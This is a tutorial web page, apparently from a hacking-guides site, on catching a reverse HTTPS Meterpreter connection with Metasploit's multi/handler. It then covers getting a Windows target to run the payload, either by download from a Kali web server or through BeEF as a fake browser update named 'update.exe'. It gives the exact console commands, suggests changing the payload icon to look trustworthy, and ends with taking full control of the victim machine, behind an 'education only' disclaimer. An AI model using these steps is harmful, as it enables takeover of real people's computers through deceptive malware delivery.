Listening to the connection of your payload

Once you have created a backdoor payload, it's time to put it in use.

You will do that with "Metasploit" by typing in your Keli terminal:

# msfconsole

Once the program is running, type the following commend to use your exploit:

msf exploit(handler) > use exploit/multi/handler

This exploit allows you to listen to incoming connections.

You created a payload for revers https, so let’s set it:

msf exploit(multi/handler) > set PAYLOAD windows/meterpreter/reverse_https

Do not forget to set your LHOST (your IP) + LPORT

msf5 exploit(multi/handler)> set LHOST 10.0.2.4

msf5 exploit(multi/handler)> set LPORT 8080

msf5 exploit(multi/handler)> show options

You are ready, run the command “exploit” and your machine will wait for the incoming connection.

Now, you need to send the payload to your target, the Windows 10 machine.

For now, put it in the Kali webserver and download it from there. You can do the same with any website/share drive / FTP and so on.

In this example I'll set the payload in:

/var/www/html/evil-files/

Navigate to the folder in your Kali machine using the browser to check if you can see the file. http://localhost/evil-files/

If you can see the file, power on your windows machine and navigate to the Kali IP and to the “folder_name” to download the payload (http://10.0.2.4/evil-files/):

Once the target runs the payload (download, run, approve) you will see the connection established in your Kali machine –> You now have full control on the Windows machine:

run the commend:

sysinfo

to see the information of the system you connected to, to make sure you are on the right system:

Let’s get full control using your payload and Beef.

If you open your Beef app in Kali, you will see the target machine and you will know what browser the target is using.

Create a new payload and name it "update.exe"

Upload the new payload to your "Beef" interface, change the message so it will look like a new update for the browser >> click Execute.

On your target's machine, you will get a notification bar for the new update.

In order for the new payload to work, the target needs to download and install the update. Try it yourself to see.

(I recommend to search online for a way to change the icon of your payload so it will look more reliable).

Before the target clicks on it, you need to listen on the port via your "msf" - Meterpreter

Run:

msf exploit(handler) > exploit

Now when the target will run the .exe file you will get full control over the machine.

I recommend searching the web for more attacks

All the guides, tips, and tricks on this web site are for education purpose only, the website owner is not accountable for any use of this information

Home

About

Guides